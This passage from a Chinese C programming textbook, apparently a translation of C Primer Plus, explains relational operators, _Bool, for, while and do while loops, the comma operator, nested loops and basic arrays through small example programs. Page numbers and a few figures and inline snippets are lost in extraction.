入了下一次迭代。 读者可能不太理解,程序的循环一直运行着,用户在输入q后完全没机 会继续输入。如果scanf()读取指定形式的输入失败,就把无法读取的输入留 在输入队列中,供下次读取。当scanf()把q作为整数读取时失败了,它把 q 留下。在下次循环时,scanf()从上次读取失败的地方(q)开始读取,scanf() 把q作为整数读取,又失败了。因此,这样修改后不仅创建了一个无限循 环,还创建了一个无限失败的循环,真让人沮丧。好在计算机觉察不出来。 对计算机而言,无限地执行这些愚蠢的指令比成功预测未来10年的股市行情 没什么两样。 不要在本应使用==的地方使用=。一些计算机语言(如,BASIC)用相 同的符号表示赋值运算符和关系相等运算符,但是这两个运算符完全不同 (见图 6.2)。赋值运算符把一个值赋给它左侧的变量;而关系相等运算符 检查它左侧和右侧的值是否相等,不会改变左侧变量的值(如果左侧是一个 变量)。 图6.2 关系运算符==和赋值运算符= 示例如下: 336 要注意使用正确的运算符。编译器不会检查出你使用了错误的形式,得 出也不是预期的结果(误用=的人实在太多了,以至于现在大多数编译器都 会给出警告,提醒用户是否要这样做)。如果待比较的一个值是常量,可以 把该常量放在左侧有助于编译器捕获错误: 可以这样做是因为C语言不允许给常量赋值,编译器会把赋值运算符的 这种用法作为语法错误标记出来。许多经验丰富的程序员在构建比较是否相 等的表达式时,都习惯把常量放在左侧。 总之,关系运算符用于构成关系表达式。关系表达式为真时值为1,为 假时值为0。通常用关系表达式作为测试条件的语句(如while和if)可以使 用任何表达式作为测试条件,非零为真,零为假。 6.3.4 新的_Bool类型 在C语言中,一直用int类型的变量表示真/假值。C99专门针对这种类型 的变量新增了_Bool类型。该类型是以英国数学家George Boole的名字命名 的,他开发了用代数表示逻辑和解决逻辑问题。在编程中,表示真或假的变 量被称为布尔变量(Boolean variable),所以_Bool是C语言中布尔变量的类 型名。_Bool类型的变量只能储存1(真)或0(假)。如果把其他非零数值 赋给_Bool类型的变量,该变量会被设置为1。这反映了C把所有的非零值都 视为真。 程序清单6.9修改了程序清单6.8中的测试条件,把int类型的变量status替 换为_Bool类型的变量input_is_good。给布尔变量取一个能表示真或假值的 变量名是一种常见的做法。 337 程序清单6.9 boolean.c程序 // boolean.c -- 使用_Bool类型的变量 variable #include <stdio.h> int main(void) { long num; long sum = 0L; _Bool input_is_good; printf("Please enter an integer to be summed "); printf("(q to quit): "); input_is_good = (scanf("%ld", &num) == 1); while (input_is_good) { sum = sum + num; printf("Please enter next integer (q to quit): "); input_is_good = (scanf("%ld", &num) == 1); } printf("Those integers sum to %ld.\n", sum); return 0; 338 } 注意程序中把比较的结果赋值给_Bool类型的变量input_is_good: input_is_good = (scanf("%ld", &num) == 1); 这样做没问题,因为==运算符返回的值不是1就是0。顺带一提,从优 先级方面考虑的话,并不需要用圆括号把 括起来。但是,这样做可以提高代 码可读性。还要注意,如何为变量命名才能让while循环的测试简单易懂: while (input_is_good) C99提供了stdbool.h头文件,该头文件让bool成为_Bool的别名,而且还 把true和false分别定义为1和0的符号常量。包含该头文件后,写出的代码可 以与C++兼容,因为C++把bool、true和false定义为关键字。 如果系统不支持_Bool类型,导致无法运行该程序,可以把_Bool替换成 int即可。 6.3.5 优先级和关系运算符 关系运算符的优先级比算术运算符(包括+和-)低,比赋值运算符高。 这意味着x > y + 2和x > (y+ 2)相同,x = y > 2和x = (y > 2)相同。换言之,如 果y大于2,则给x赋值1,否则赋值0。y的值不会赋给x。 关系运算符比赋值运算符的优先级高,因此,x_bigger = x > y;相当于 x_bigger = (x > y);。 关系运算符之间有两种不同的优先级。 高优先级组: <<= >>= 低优先级组: == != 339 与其他大多数运算符一样,关系运算符的结合律也是从左往右。因此: ex != wye == zee与(ex != wye) == zee相同 首先,C判断ex与wye是否相等;然后,用得出的值1或0(真或假)再 与zee比较。我们并不推荐这样写,但是在这里有必要说明一下。 表6.2列出了目前我们学过的运算符的性质。附录B的参考资料II“C运算 符”中列出了全部运算符的完整优先级表。 表6.2 运算符优先级 小结:while语句 关键字:while 一般注解: while语句创建了一个循环,重复执行直到测试表达式为假或0。while语 句是一种入口条件循环,也就是说,在执行多次循环之前已决定是否执行循 环。因此,循环有可能不被执行。循环体可以是简单语句,也可以是复合语 句。 形式: while ( expression ) statement 340 在expression部分为假或0之前,重复执行statement部分。 示例: while (n++ < 100) printf(" %d %d\n",n, 2 * n + 1); // 简单语句 while (fargo < 1000) { // 复合语句 fargo = fargo + step; step = 2 * step; } 小结:关系运算符和表达式 关系运算符: 每个关系运算符都把它左侧的值和右侧的值进行比较。 <     小于 <=     小于或等于 ==     等于 >=     大于或等于 >     大于 !=     不等于 关系表达式: 341 简单的关系表达式由关系运算符及其运算对象组成。如果关系为真,关 系表达式的值为 1;如果关系为假,关系表达式的值为0。 示例: 5 > 2为真,关系表达式的值为1 (2 + a) == a 为假,关系表达式的值为0 342 6.4 不确定循环和计数循环 一些while循环是不确定循环(indefinite loop)。所谓不确定循环,指 在测试表达式为假之前,预先不知道要执行多少次循环。例如,程序清单 6.1通过与用户交互获得数据来计算整数之和。我们事先并不知道用户会输 入什么整数。另外,还有一类是计数循环(counting loop)。这类循环在执 行循环之前就知道要重复执行多少次。程序清单6.10就是一个简单的计数循 环。 程序清单6.10 sweetie1.c程序 // sweetie1.c -- 一个计数循环 #include <stdio.h> int main(void) { const int NUMBER = 22; int count = 1;             // 初始化 while (count <= NUMBER)        // 测试 { printf("Be my Valentine!\n");  // 行为 count++;              // 更新计数 } return 0; } 343 虽然程序清单6.10运行情况良好,但是定义循环的行为并未组织在一 起,程序的编排并不是很理想。我们来仔细分析一下。 在创建一个重复执行固定次数的循环中涉及了3个行为: 1.必须初始化计数器; 2.计数器与有限的值作比较; 3.每次循环时递增计数器。 while循环的测试条件执行比较,递增运算符执行递增。程序清单6.10 中,递增发生在循环的末尾,这可以防止不小心漏掉递增。因此,这样做比 将测试和更新组合放在一起(即使用count++ <= NUMBER)要好,但是计数 器的初始化放在循环外,就有可能忘记初始化。实践告诉我们可能会发生的 事情终究会发生,所以我们来学习另一种控制语句,可以避免这些问题。 344 6.5 for循环 for循环把上述3个行为(初始化、测试和更新)组合在一处。程序清单 6.11使用for循环修改了程序清单6.10的程序。 程序清单6.11 sweetie2.c程序 // sweetie2.c -- 使用for循环的计数循环 #include <stdio.h> int main(void) { const int NUMBER = 22; int count; for (count = 1; count <= NUMBER; count++) printf("Be my Valentine!\n"); return 0; } 关键字for后面的圆括号中有3个表达式,分别用两个分号隔开。第1个 表达式是初始化,只会在for循环开始时执行一次。第 2 个表达式是测试条 件,在执行循环之前对表达式求值。如果表达式为假(本例中,count大于 NUMBER时),循环结束。第3个表达式执行更新,在每次循环结束时求 值。程序清单6.10用这个表达式递增count 的值,更新计数。完整的for语句 还包括后面的简单语句或复合语句。for圆括号中的表达式也叫做控制表达 式,它们都是完整表达式,所以每个表达式的副作用(如,递增变量)都发 生在对下一个表达式求值之前。图6.3演示了for循环的结构。 345 图6.3 for循环的结构 程序清单6.12 for_cube.c程序 /* for_cube.c -- 使用for循环创建一个立方表 */ #include <stdio.h> int main(void) { int num; printf("   n  n cubed\n"); for (num = 1; num <= 6; num++) printf("%5d %5d\n", num, num*num*num); return 0; 346 } 程序清单6.12打印整数1~6及其对应的立方,该程序的输出如下: n    n cubed 1       1 2       8 3       27 4       64 5      125 6      216 for循环的第1行包含了循环所需的所有信息:num的初值,num的终 值[1]和每次循环num的增量。 6.5.1 利用for的灵活性 虽然for循环看上去和FORTRAN的DO循环、Pascal的FOR循环、BASIC 的FOR...NEXT循环类似,但是for循环比这些循环灵活。这些灵活性源于如 何使用for循环中的3个表达式。以前面程序示例中的for循环为例,第1个表 达式给计数器赋初值,第2个表达式表示计数器的范围,第3个表达式递增计 数器。这样使用for循环确实很像其他语言的循环。除此之外,for循环还有 其他9种用法。 可以使用递减运算符来递减计数器: /* for_down.c */ #include <stdio.h> 347 int main(void) { int secs; for (secs = 5; secs > 0; secs--) printf("%d seconds!\n", secs); printf("We have ignition!\n"); return 0; } 该程序输出如下: 5 seconds! 4 seconds! 3 seconds! 2 seconds! 1 seconds! We have ignition! 可以让计数器递增2、10等: /* for_13s.c */ #include <stdio.h> int main(void) 348 { int n; // 从2开始,每次递增13 for (n = 2; n < 60; n = n + 13) printf("%d \n", n); return 0; } 每次循环n递增13,程序的输出如下: 2 15 28 41 54 可以用字符代替数字计数: /* for_char.c */ #include <stdio.h> int main(void) { char ch; for (ch = 'a'; ch <= 'z'; ch++) 349 printf("The ASCII value for %c is %d.\n", ch, ch); return 0; } 该程序假定系统用ASCII码表示字符。由于篇幅有限,省略了大部分输 出: The ASCII value for a is 97. The ASCII value for b is 98. ... The ASCII value for x is 120. The ASCII value for y is 121. The ASCII value for z is 122. 该程序能正常运行是因为字符在内部是以整数形式储存的,因此该循环 实际上仍是用整数来计数。 除了测试迭代次数外,还可以测试其他条件。在for_cube程序中,可以 把: for (num = 1; num <= 6; num++) 替换成: for (num = 1; num*num*num <= 216; num++) 如果与控制循环次数相比,你更关心限制立方的大小,就可以使用这样 的测试条件。 350 可以让递增的量几何增长,而不是算术增长。也就是说,每次都乘上而 不是加上一个固定的量: /* for_geo.c */ #include <stdio.h> int main(void) { double debt; for (debt = 100.0; debt < 150.0; debt = debt * 1.1) printf("Your debt is now $%.2f.\n", debt); return 0; } 该程序中,每次循环都把debt乘以1.1,即debt的值每次都增加10%,其 输出如下: Your debt is now $100.00. Your debt is now $110.00. Your debt is now $121.00. Your debt is now $133.10. Your debt is now $146.41. 第3个表达式可以使用任意合法的表达式。无论是什么表达式,每次迭 代都会更新该表达式的值。 351 /* for_wild.c */ #include <stdio.h> int main(void) { int x; int y = 55; for (x = 1; y <= 75; y = (++x * 5) + 50) printf("%10d %10d\n", x, y); return 0; } 该循环打印x的值和表达式++x * 5 + 50的值,程序的输出如下: 1      55 2      60 3      65 4      70 5      75 注意,测试涉及y,而不是x。for循环中的3个表达式可以是不同的变量 (注意,虽然该例可以正常运行,但是编程风格不太好。如果不在更新部分 加入代数计算,程序会更加清楚)。 可以省略一个或多个表达式(但是不能省略分号),只要在循环中包含 352 能结束循环的语句即可。 /* for_none.c */ #include <stdio.h> int main(void) { int ans, n; ans = 2; for (n = 3; ans <= 25;) ans = ans * n; printf("n = %d; ans = %d.\n", n, ans); return 0; } 该程序的输出如下: n = 3; ans = 54. 该循环保持n的值为3。变量ans开始的值为2,然后递增到6和18,最终 是54(18比25小,所以for循环进入下一次迭代,18乘以3得54)。顺带一 提,省略第2个表达式被视为真,所以下面的循环会一直运行: for (; ; ) printf("I want some action\n"); 第1个表达式不一定是给变量赋初值,也可以使用printf()。记住,在执 353 行循环的其他部分之前,只对第1个表达式求值一次或执行一次。 /* for_show.c */ #include <stdio.h> int main(void) { int num = 0; for (printf("Keep entering numbers!\n"); num != 6;) scanf("%d", &num); printf("That's the one I want!\n"); return 0; } 该程序打印第1行的句子一次,在用户输入6之前不断接受数字: Keep entering numbers! 3 5 8 6 That's the one I want! 循环体中的行为可以改变循环头中的表达式。例如,假设创建了下面的 354 循环: for (n = 1; n < 10000; n = n + delta) 如果程序经过几次迭代后发现delta太小或太大,循环中的if语句(详见 第7章)可以改变delta的大小。在交互式程序中,用户可以在循环运行时才 改变 delta 的值。这样做也有危险的一面,例如,把delta设置为0就没用了。 总而言之,可以自己决定如何使用for循环头中的表达式,这使得在执 行固定次数的循环外,还可以做更多的事情。接下来,我们将简要讨论一些 运算符,使for循环更加有用。 小结:for语句 关键字:for 一般注解: for语句使用3个表达式控制循环过程,分别用分号隔开。initialize表达 式在执行for语句之前只执行一次;然后对test表达式求值,如果表达式为真 (或非零),执行循环一次;接着对update表达式求值,并再次检查test表达 式。for语句是一种入口条件循环,即在执行循环之前就决定了是否执行循 环。因此,for循环可能一次都不执行。statement部分可以是一条简单语句或 复合语句。 形式: for ( initialize; test; update ) statement 在test为假或0之前,重复执行statement部分。 示例: 355 for (n = 0; n < 10 ; n++) printf(" %d %d\n", n, 2 * n + 1); 356 6.6 其他赋值运算符:+=、-=、*=、/=、%= C有许多赋值运算符。最基本、最常用的是=,它把右侧表达式的值赋 给左侧的变量。其他赋值运算符都用于更新变量,其用法都是左侧是一个变 量名,右侧是一个表达式。赋给变量的新值是根据右侧表达式的值调整后的 值。确切的调整方案取决于具体的运算符。例如: scores += 20   与   scores = scores + 20   相同 dimes -= 2    与   dimes = dimes - 2       相同 bunnies *= 2   与   bunnies = bunnies * 2    相同 time /= 2.73   与   time = time / 2.73    相同 reduce %= 3    与   reduce = reduce % 3    相同 上述所列的运算符右侧都使用了简单的数,还可以使用更复杂的表达 式,例如: x *= 3 * y + 12 与 x = x * (3 * y + 12) 相同 以上提到的赋值运算符与=的优先级相同,即比+或*优先级低。上面最 后一个例子也反映了赋值运算符的优先级,3 * y先与12相加,再把计算结果 与x相乘,最后再把乘积赋给x。 并非一定要使用这些组合形式的赋值运算符。但是,它们让代码更紧 凑,而且与一般形式相比,组合形式的赋值运算符生成的机器代码更高效。 当需要在for循环中塞进一些复杂的表达式时,这些组合的赋值运算符特别 有用。 357 6.7 逗号运算符 逗号运算符扩展了for循环的灵活性,以便在循环头中包含更多的表达 式。例如,程序清单6.13演示了一个打印一类邮件资费(first-class postage rate)的程序(在撰写本书时,邮资为首重40美分/盎司,续重20美分/盎 司,可以在互联网上查看当前邮资)。 程序清单6.13 postage.c程序 // postage.c -- 一类邮资 #include <stdio.h> int main(void) { const int FIRST_OZ = 46;  // 2013邮资 const int NEXT_OZ = 20;   // 2013邮资 int ounces, cost; printf(" ounces  cost\n"); for (ounces = 1, cost = FIRST_OZ; ounces <= 16;  ounces++,cost += NEXT_OZ) printf("%5d  $%4.2f\n", ounces, cost / 100.0); return 0; } 该程序的前5行输出如下: 358 ounces cost 1     $0.46 2     $0.66 3     $0.86 4     $1.06 该程序在初始化表达式和更新表达式中使用了逗号运算符。初始化表达 式中的逗号使ounces和cost都进行了初始化,更新表达式中的逗号使每次迭 代ounces递增1、cost递增20(NEXT_Z的值是20)。绝大多数计算都在for循 环头中进行(见图6.4)。 逗号运算符并不局限于在for循环中使用,但是这是它最常用的地方。 逗号运算符有两个其他性质。首先,它保证了被它分隔的表达式从左往右求 值(换言之,逗号是一个序列点,所以逗号左侧项的所有副作用都在程序执 行逗号右侧项之前发生)。因此,ounces在cost之前被初始化。在该例中, 顺序并不重要,但是如果cost的表达式中包含了ounces时,顺序就很重要。 例如,假设有下面的表达式: ounces++, cost = ounces * FIRST_OZ 在该表达式中,先递增ounce,然后在第2个子表达式中使用ounce的新 值。作为序列点的逗号保证了左侧子表达式的副作用在对右侧子表达式求值 之前发生。 359 图6.4 逗号运算符和for循环 其次,整个逗号表达式的值是右侧项的值。例如,下面语句 x = (y = 3, (z = ++y + 2) + 5);的效果是:先把3赋给y,递增y为4,然后把 4加2之和(6)赋给z,接着加上5,最后把结果11赋给 x。至于为什么有人 编写这样的代码,在此不做评价。另一方面,假设在写数字时不小心输入了 逗号: houseprice = 249,500; 这不是语法错误,C 编译器会将其解释为一个逗号表达式,即 houseprice = 249 是逗号左侧的子表达式,500 是右侧的子表达式。因此,整 个逗号表达式的值是逗号右侧表达式的值,而且左侧的赋值表达式把249赋 给变量houseprice。因此,这与下面代码的效果相同: houseprice = 249; 500;记住,任何表达式后面加上一个分号就成了表达式语句。所以, 500;也是一条语句,但是什么也不做。 360 另外,下面的语句 houseprice = (249,500); 赋给houseprice的值是逗号右侧子表达式的值,即500。 逗号也可用作分隔符。在下面语句中的逗号都是分隔符,不是逗号运算 符: char ch, date; printf("%d %d\n", chimps, chumps); 小结:新的运算符 赋值运算符: 下面的运算符用右侧的值,根据指定的操作更新左侧的变量: +=  把右侧的值加到左侧的变量上 -=  从左侧的变量中减去右侧的值 *=  把左侧的变量乘以右侧的值 /=  把左侧的变量除以右侧的值 %=  左侧变量除以右侧值得到的余数 示例: rabbits *= 1.6;与rabbits = rabbits * 1.6;相同 这些组合赋值运算符与普通赋值运算符的优先级相同,都比算术运算符 的优先级低。因此, contents *= old_rate + 1.2; 361 最终的效果与下面的语句相同: contents = contents * (old_rate + 1.2); 逗号运算符: 逗号运算符把两个表达式连接成一个表达式,并保证最左边的表达式最 先求值。逗号运算符通常在for循环头的表达式中用于包含更多的信息。整 个逗号表达式的值是逗号右侧表达式的值。 示例: for (step = 2, fargo = 0; fargo < 1000; step *= 2) fargo += step; 6.7.1 当Zeno遇到for循环 接下来,我们看看 for 循环和逗号运算符如何解决古老的悖论。希腊哲 学家 Zeno 曾经提出箭永远不会达到它的目标。首先,他认为箭要到达目标 距离的一半,然后再达到剩余距离的一半,然后继续到达剩余距离的一半, 这样就无穷无尽。Zeno认为箭的飞行过程有无数个部分,所以要花费无数时 间才能结束这一过程。不过,我们怀疑Zeno是自愿甘做靶子才会得出这样的 结论。 我们采用一种定量的方法,假设箭用1秒钟走完一半的路程,然后用1/2 秒走完剩余距离的一半,然后用1/4秒再走完剩余距离的一半,等等。可以 用下面的无限序列来表示总时间: 1 + 1/2 + 1/4 + 1/8 + 1/16 +.... 程序清单6.14中的程序求出了序列前几项的和。变量power_of_two的值 分别是1.0、2.0、4.0、8.0等。 程序清单6.14 zeno.c程序 362 /* zeno.c -- 求序列的和 */ #include <stdio.h> int main(void) { int t_ct;    // 项计数 double time, power_of_2; int limit; printf("Enter the number of terms you want: "); scanf("%d", &limit); for (time = 0, power_of_2 = 1, t_ct = 1; t_ct <= limit; t_ct++, power_of_2 *= 2.0) { time += 1.0 / power_of_2; printf("time = %f when terms = %d.\n", time, t_ct); } return 0; } 下面是序列前15项的和: Enter the number of terms you want: 15 363 time = 1.000000 when terms = 1. time = 1.500000 when terms = 2. time = 1.750000 when terms = 3. time = 1.875000 when terms = 4. time = 1.937500 when terms = 5. time = 1.968750 when terms = 6. time = 1.984375 when terms = 7. time = 1.992188 when terms = 8. time = 1.996094 when terms = 9. time = 1.998047 when terms = 10. time = 1.999023 when terms = 11. time = 1.999512 when terms = 12. time = 1.999756 when terms = 13. time = 1.999878 when terms = 14. time = 1.999939 when terms = 15. 不难看出,尽管不断添加新的项,但是总和看起来变化不大。就像程序 输出显示的那样,数学家的确证明了当项的数目接近无穷时,总和无限接近 2.0。假设S表示总和,下面我们用数学的方法来证明一下: S = 1 + 1/2 + 1/4 + 1/8 + ... 这里的省略号表示“等等”。把S除以2得: 364 S/2 = 1/2 + 1/4 + 1/8 + 1/16 + ... 第1个式子减去第2个式子得: S - S/2 = 1 +1/2 -1/2 + 1/4 -1/4 +... 除了第1个值为1,其他的值都是一正一负地成对出现,所以这些项都可 以消去。只留下: S/2 = 1 然后,两侧同乘以2,得: S = 2 从这个示例中得到的启示是,在进行复杂的计算之前,先看看数学上是 否有简单的方法可用。 程序本身是否有需要注意的地方?该程序演示了在表达式中可以使用多 个逗号运算符,在for循环中,初始化了time、power_of_2和count。构建完循 环条件之后,程序本身就很简短了。 365 6.8 出口条件循环:do while while循环和for循环都是入口条件循环,即在循环的每次迭代之前检查 测试条件,所以有可能根本不执行循环体中的内容。C语言还有出口条件循 环(exit-condition loop),即在循环的每次迭代之后检查测试条件,这保证 了至少执行循环体中的内容一次。这种循环被称为 do while循环。程序清单 6.15 演示了一个示例。 程序清单6.15 do_while.c程序 /* do_while.c -- 出口条件循环 */ #include <stdio.h> int main(void) { const int secret_code = 13; int code_entered; do { printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); } while (code_entered != secret_code); printf("Congratulations! You are cured!\n"); 366 return 0; } 程序清单6.15在用户输入13之前不断提示用户输入数字。下面是一个运 行示例: To enter the triskaidekaphobia therapy club, please enter the secret code number: 12 To enter the triskaidekaphobia therapy club, please enter the secret code number: 14 To enter the triskaidekaphobia therapy club, please enter the secret code number: 13 Congratulations! You are cured! 使用while循环也能写出等价的程序,但是长一些,如程序清单6.16所 示。 程序清单6.16 entry.c程序 /* entry.c -- 出口条件循环 */ #include <stdio.h> int main(void) { const int secret_code = 13; int code_entered; 367 printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); while (code_entered != secret_code) { printf("To enter the triskaidekaphobia therapy club,\n"); printf("please enter the secret code number: "); scanf("%d", &code_entered); } printf("Congratulations! You are cured!\n"); return 0; } 下面是do while循环的通用形式: do statement while ( expression ); statement可以是一条简单语句或复合语句。注意,do while循环以分号 结尾,其结构见图6.5。 do while循环在执行完循环体后才执行测试条件,所以至少执行循环体 一次;而for循环或while循环都是在执行循环体之前先执行测试条件。do 368 while循环适用于那些至少要迭代一次的循环。例如,下面是一个包含do while循环的密码程序伪代码: 图6.5 do while循环的结构 do { 提示用户输入密码 读取用户输入的密码 } while (用户输入的密码不等于密码); 避免使用这种形式的do while结构: do { 询问用户是否继续 369 其他行为 } while (回答是yes); 这样的结构导致用户在回答“no”之后,仍然执行“其他行为”部分,因为 测试条件执行晚了。 小结:do while语句 关键字:do while 一般注解: do while 语句创建一个循环,在 expression 为假或 0 之前重复执行循环 体中的内容。do while语句是一种出口条件循环,即在执行完循环体后才根 据测试条件决定是否再次执行循环。因此,该循环至少必须执行一次。 statement部分可是一条简单语句或复合语句。 形式: do statement while ( expression ); 在test为假或0之前,重复执行statement部分。 示例: do scanf("%d", &number); while (number != 20); 370 6.9 如何选择循环 如何选择使用哪一种循环?首先,确定是需要入口条件循环还是出口条 件循环。通常,入口条件循环用得比较多,有几个原因。其一,一般原则是 在执行循环之前测试条件比较好。其二,测试放在循环的开头,程序的可读 性更高。另外,在许多应用中,要求在一开始不满足测试条件时就直接跳过 整个循环。 那么,假设需要一个入口条件循环,用for循环还是while循环?这取决 于个人喜好,因为二者皆可。要让for循环看起来像while循环,可以省略第1 个和第3个表达式。例如: for ( ; test ; ) 与下面的while效果相同: while ( test ) 要让while循环看起来像for循环,可以在while循环的前面初始化变量, 并在while循环体中包含更新语句。例如: 初始化; while ( 测试 ) { 其他语句 更新语句 } 与下面的for循环效果相同: 371 for ( 初始化 ;测试 ; 更新 ) 其他语句 一般而言,当循环涉及初始化和更新变量时,用for循环比较合适,而 在其他情况下用while循环更好。对于下面这种条件,用while循环就很合 适: while (scanf("%ld", &num) == 1) 对于涉及索引计数的循环,用for循环更适合。例如: for (count = 1; count <= 100; count++) 372 6.10 嵌套循环 嵌套循环(nested loop)指在一个循环内包含另一个循环。嵌套循环常 用于按行和列显示数据,也就是说,一个循环处理一行中的所有列,另一个 循环处理所有的行。程序清单6.17演示了一个简单的示例。 程序清单6.17 rows1.c程序 /* rows1.c -- 使用嵌套循环 */ #include <stdio.h> #define ROWS  6 #define CHARS 10 int main(void) { int row; char ch; for (row = 0; row < ROWS; row++)         /* 第10行 */ { for (ch = 'A'; ch < ('A' + CHARS); ch++)   /* 第12行 */ printf("%c", ch); printf("\n"); } 373 return 0; } 运行该程序后,输出如下: ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ ABCDEFGHIJ 6.10.1 程序分析 第10行开始的for循环被称为外层循环(outer loop),第12行开始的for 循环被称为内层循环(inner loop)。外层循环从row为0开始循环,到row为 6时结束。因此,外层循环要执行6次,row的值从0变为5。每次迭代要执行 的第1条语句是内层的for循环,该循环要执行10次,在同一行打印字符A~ J;第2条语句是外层循环的printf("\n");,该语句的效果是另起一行,这样在 下一次运行内层循环时,将在下一行打印的字符。 注意,嵌套循环中的内层循环在每次外层循环迭代时都执行完所有的循 环。在程序清单6.17中,内层循环一行打印10个字符,外层循环创建6行。 6.10.2 嵌套变式 上一个实例中,内层循环和外层循环所做的事情相同。可以通过外层循 环控制内层循环,在每次外层循环迭代时内层循环完成不同的任务。把程序 清单6.17稍微修改后,如程序清单6.18所示。内层循环开始打印的字符取决 374 于外层循环的迭代次数。该程序的第 1 行使用了新的注释风格,而且用 const 关键字代替#define,有助于读者熟悉这两种方法。 程序清单6.18 rows2.c程序 // rows2.c -- 依赖外部循环的嵌套循环 #include <stdio.h> int main(void) { const int ROWS = 6; const int CHARS = 6; int row; char ch; for (row = 0; row < ROWS; row++) { for (ch = ('A' + row); ch < ('A' + CHARS); ch++) printf("%c", ch); printf("\n"); } return 0; } 375 该程序的输出如下: ABCDEF BCDEF CDEF DEF EF F 因为每次迭代都要把row的值与‘A’相加,所以ch在每一行都被初始化为 不同的字符。然而,测试条件并没有改变,所以每行依然是以F结尾,这使 得每一行打印的字符都比上一行少一个。 376 6.11 数组简介 在许多程序中,数组很重要。数组可以作为一种储存多个相关项的便利 方式。我们在第10章中将详细介绍数组,但是由于循环经常用到数组,所以 在这里先简要地介绍一下。 数组(array)是按顺序储存的一系列类型相同的值,如10个char类型的 字符或15个int类型的值。整个数组有一个数组名,通过整数下标访问数组中 单独的项或元素(element)。例如,以下声明: float debts[20]; 声明debts是一个内含20个元素的数组,每个元素都可以储存float类型的 值。数组的第1个元素是debts[0],第2个元素是debts[1],以此类推,直到 debts[19]。注意,数组元素的编号从0开始,不是从1开始。可以给每个元素 赋float类型的值。例如,可以这样写: debts[5] = 32.54; debts[6] = 1.2e+21; 实际上,使用数组元素和使用同类型的变量一样。例如,可以这样把值 读入指定的元素中: scanf("%f", &debts[4]); // 把一个值读入数组的第5个元素 这里要注意一个潜在的陷阱:考虑到影响执行的速度,C 编译器不会检 查数组的下标是否正确。下面的代码,都不正确: debts[20] = 88.32;   // 该数组元素不存在 debts[33] = 828.12;  // 该数组元素不存在 编译器不会查找这样的错误。当运行程序时,这会导致数据被放置在已 377 被其他数据占用的地方,可能会破坏程序的结果甚至导致程序异常中断。 数组的类型可以是任意数据类型。 int nannies[22]; /* 可储存22个int类型整数的数组 */ char actors[26]; /* 可储存26个字符的数组 */ long big[500];  /* 可储存500个long类型整数的数组 */ 我们在第4章中讨论过字符串,可以把字符串储存在char类型的数组中 (一般而言,char类型数组的所有元素都储存char类型的值)。如果char类 型的数组末尾包含一个表示字符串末尾的空字符\0,则该数组中的内容就构 成了一个字符串(见图6.6)。 图6.6 字符数组和字符串 用于识别数组元素的数字被称为下标(subscript)、索引(indice)或 偏移量(offset)。下标必须是整数,而且要从0开始计数。数组的元素被依 次储存在内存中相邻的位置,如图6.7所示。 378 图6.7 内存中的char和int类型的数组 6.11.1 在for循环中使用数组 程序中有许多地方要用到数组,程序清单6.19是一个较为简单的例子。 该程序读取10个高尔夫分数,稍后进行处理。使用数组,就不用创建10个不 同的变量来储存10个高尔夫分数。而且,还可以用for循环来读取数据。程 序打印总分、平均分、差点(handicap,它是平均分与标准分的差值)。 程序清单6.19 scores_in.c程序 // scores_in.c -- 使用循环处理数组 #include <stdio.h> #define SIZE 10 #define PAR 72 int main(void) { int index, score[SIZE]; 379 int sum = 0; float average; printf("Enter %d golf scores:\n", SIZE); for (index = 0; index < SIZE; index++) scanf("%d", &score[index]);   // 读取10个分数 printf("The scores read in are as follows:\n"); for (index = 0; index < SIZE; index++) printf("%5d", score[index]);  // 验证输入 printf("\n"); for (index = 0; index < SIZE; index++) sum += score[index];       // 求总分数 average = (float) sum / SIZE;    // 求平均分 printf("Sum of scores = %d, average = %.2f\n", sum,  average); printf("That's a handicap of %.0f.\n", average - PAR); return 0; } 先看看程序清单6.19是否能正常工作,接下来再做一些解释。下面是程 序的输出: Enter 10 golf scores: 380 99 95 109 105 100 96 98 93 99 97 98 The scores read in are as follows: 99 95 109 105 100 96 98 93 99 97 Sum of scores = 991, average = 99.10 That's a handicap of 27. 程序运行没问题,我们来仔细分析一下。首先,注意程序示例虽然打印 了11个数字,但是只读入了10个数字,因为循环只读了10个值。由于scanf() 会跳过空白字符,所以可以在一行输入10个数字,也可以每行只输入一个数 字,或者像本例这样混合使用空格和换行符隔开每个数字(因为输入是缓冲 的,只有当用户键入Enter键后数字才会被发送给程序)。 然后,程序使用数组和循环处理数据,这比使用10个单独的scanf()语句 和10个单独的printf()语句读取10个分数方便得多。for循环提供了一个简单直 接的方法来使用数组下标。注意,int类型数组元素的用法与int类型变量的用 法类似。要读取int类型变量fue,应这样写 。程序 清单6.19中要读取int类型的元素 ,所以这样写 。 该程序示例演示了一些较好的编程风格。第一,用#define 指令创建的 明示常量(SIZE)来指定数组的大小。这样就可以在定义数组和设置循环边 界时使用该明示常量。如果以后要扩展程序处理20个分数,只需简单地把 SIZE重新定义为20即可,不用逐一修改程序中使用了数组大小的每一处。 第二,下面的代码可以很方便地处理一个大小为SIZE的数组: for (index = 0; index < SIZE; index++) 381 设置正确的数组边界很重要。第1个元素的下标是0,因此循环开始时把 index设置为0。因为从0开始编号,所以数组中最后一个元素的下标是SIZE - 1。也就是说,第10个元素是score[9]。通过测试条件index < SIZE来控制循 环中使用的最后一个index的值是SIZE - 1。 第三,程序能重复显示刚读入的数据。这是很好的编程习惯,有助于确 保程序处理的数据与期望相符。 最后,注意该程序使用了3个独立的for循环。这是否必要?是否可以将 其合并成一个循环?当然可以,读者可以动手试试,合并后的程序显得更加 紧凑。但是,调整时要注意遵循模块化(modularity)的原则。模块化隐含 的思想是:应该把程序划分为一些独立的单元,每个单元执行一个任务。这 样做提高了程序的可读性。也许更重要的是,模块化使程序的不同部分彼此 独立,方便后续更新或修改程序。在掌握如何使用函数后,可以把每个执行 任务的单元放进函数中,提高程序的模块化。 382 6.12 使用函数返回值的循环示例 本章最后一个程序示例要用一个函数计算数的整数次幂(math.h库提供 了一个更强大幂函数pow(),可以使用浮点指数)。该示例有3个主要任务: 设计算法、在函数中表示算法并返回计算结果、提供一个测试函数的便利方 法。 首先分析算法。为简化函数,我们规定该函数只处理正整数的幂。这 样,把n与n相乘p次便可计算n的p次幂。这里自然会用到循环。先把变量 pow设置为1,然后将其反复乘以n: for(i = 1; i <= p; i++) pow *= n; 回忆一下,*=运算符把左侧的项乘以右侧的项,再把乘积赋给左侧的 